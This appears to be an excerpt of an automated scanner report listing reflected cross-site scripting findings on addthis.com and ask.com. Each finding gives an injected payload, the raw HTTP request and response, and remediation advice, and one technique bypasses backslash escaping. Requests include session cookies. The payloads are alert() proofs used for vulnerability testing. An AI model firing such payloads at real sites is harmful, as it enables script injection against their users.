The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 307df<script>alert(1)</script>bd5fc24f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db573<script>alert(1)</script>f9e1a86c09d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81be2"-alert(1)-"71b90c0a1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38562<script>alert(1)</script>40e45f429b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 227f5"-alert(1)-"d6b59968138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 1543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC227f5"-alert(1)-"d6b59968138"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.129. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25f7b<script>alert(1)</script>51cc3c6a826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beebb"-alert(1)-"e38d13d71e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:12:02 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=n8vgn509dukuh80gfrle1a9ug2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 1581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ecf5<script>alert(1)</script>225f6a9584 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:12:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=uv8f494h43h01fqra5pp1k3sv4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1605
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a576<script>alert(1)</script>28122e63156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130 HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:12:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=8ubi0bfslihqmjfcvl1u62r5u2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 1607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa552"-alert(1)-"7ce969362f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130 HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:12:34 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=rtbcstsg2h8rgbhq9g2pvhc250; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 1581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d83"-alert(1)-"f43f83f718e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:00 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=kai74u0c5hi68smm3pfra1et05; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4df1a<script>alert(1)</script>ff4fc4b5c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:09 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=pa4nmf2sogo37cd58aeki3on15; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c</strong> ...[SNIP]...
2.136. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9df66<script>alert(1)</script>548f4c9c066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1 HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:11:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=0urtvj47g39mh5kr9tnnta4sa0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1569
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1</strong> ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29fdb'%3balert(1)//4d917efb5f3 was submitted in the l parameter. This input was echoed as 29fdb';alert(1)//4d917efb5f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictures?q=Ohio&o=0&l=29fdb'%3balert(1)//4d917efb5f3&qsrc=3015 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head>
...[SNIP]...
var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=ADABB184D90011265DC483D042F04B4F&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=29fdb';alert(1)//4d917efb5f3';
The value of the l request parameter is copied into a JavaScript rest-of-line comment. The payload ec4a3%0aalert(1)//34861841eee was submitted in the l parameter. This input was echoed as ec4a3 alert(1)//34861841eee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictures?q=Ohio&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88aec4a3%0aalert(1)//34861841eee&qsrc=3015 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head>
...[SNIP]...
var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=5FE0A0EC710BBBF7BFB5CE57623B5A62&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88aec4a3 alert(1)//34861841eee';
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd16d\'%3b4e4b316f914 was submitted in the q parameter. This input was echoed as cd16d\\';4e4b316f914 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /pictures?q=Ohiocd16d\'%3b4e4b316f914&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88a&qsrc=3015 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb41'%3balert(1)//d1f92dec88a was submitted in the l parameter. This input was echoed as 5fb41';alert(1)//d1f92dec88a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding?o=0&l=dir5fb41'%3balert(1)//d1f92dec88a HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68661\'%3bad7a82f13fb was submitted in the q parameter. This input was echoed as 68661\\';ad7a82f13fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /pictureslanding?q=68661\'%3bad7a82f13fb&o=0&l=dir5fb41 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f84\'%3ba552257ac42 was submitted in the q parameter. This input was echoed as 41f84\\';a552257ac42 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
